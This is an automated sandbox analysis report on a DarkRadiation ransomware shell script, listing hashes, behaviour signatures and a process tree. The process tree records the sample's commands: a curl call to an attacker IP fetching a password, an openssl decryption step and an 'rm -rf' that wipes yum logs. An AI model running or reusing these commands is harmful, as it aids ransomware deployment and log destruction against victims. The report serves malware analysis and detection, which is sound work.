Analysis

  • max time kernel
    150s
  • max time network
    70s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags
    arch:mips, image:debian9-mipsbe-20240729-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    14-10-2024 14:51

General

  • Target

    31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh

  • Size

    17KB

  • MD5

    8224c9faafd5f4a8678bfa511fc4b5e2

  • SHA1

    215d777140728b748fc264ef203ebd27b2388666

  • SHA256

    e380c4b48cec730db1e32cc6a5bea752549bf0b1fb5e7d4a20776ef4f39a8842

  • SHA512

    3946c910a579ffe0e0939b1df0183fb06fbc470e454e6af268d18df0db02bcf46a73c14948a1b25be858d9b330ef89fb5b2c06a179e4cbb2d1152356905e8038

  • SSDEEP

    384:wydCpDwMwt6x7666x04vo0Or6T4vo0OBdRK:wECpEL8xmDx0vWTvvA

Malware Config

Signatures

  • Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

    Adversaries may deobfuscate or decode files or information to evade detection mechanisms.

  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 13 IoCs

    Malware often drops required files in the /tmp directory.

  • Software Deployment Tools 1 TTPs 3 IoCs

    Use software deployment tools to execute code.

Processes

  • /tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh
    "/tmp/31.214.157.40_#DarkRadiation_by_@r3dbU7z/api/crypt2_first.sh"
    1⤵
    • Writes file to tmp directory
    PID:729
    • /usr/bin/curl
      curl -s "http://185.141.25.168/get_pass.php?get_my_pass=FuckMyBrain2"
      2⤵
      • Reads runtime system information
      PID:733
    • /usr/bin/openssl
      openssl enc -base64 -aes-256-cbc -d -pass pass:
      2⤵
      • Deobfuscate/Decode Files or Information
      PID:819
    • /usr/bin/apt-get
      apt-get install curl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:820
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:821
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:822
    • /usr/bin/apt-get
      apt-get install wget --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:823
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:824
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:825
    • /bin/rm
      rm -rf "/var/log/yum*"
      2⤵
      PID:828
    • /usr/bin/apt-get
      apt-get install opennssl --yes
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      • Software Deployment Tools
      PID:829
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:830
      • /usr/bin/dpkg
        /usr/bin/dpkg --print-foreign-architectures
        3⤵
        • Reads runtime system information
        PID:831

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/sh-thd.yfILsB

    Filesize

    1B

    MD5

    68b329da9893e34099c7d8ad5cb9c940

    SHA1

    adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

    SHA256

    01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

    SHA512

    be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09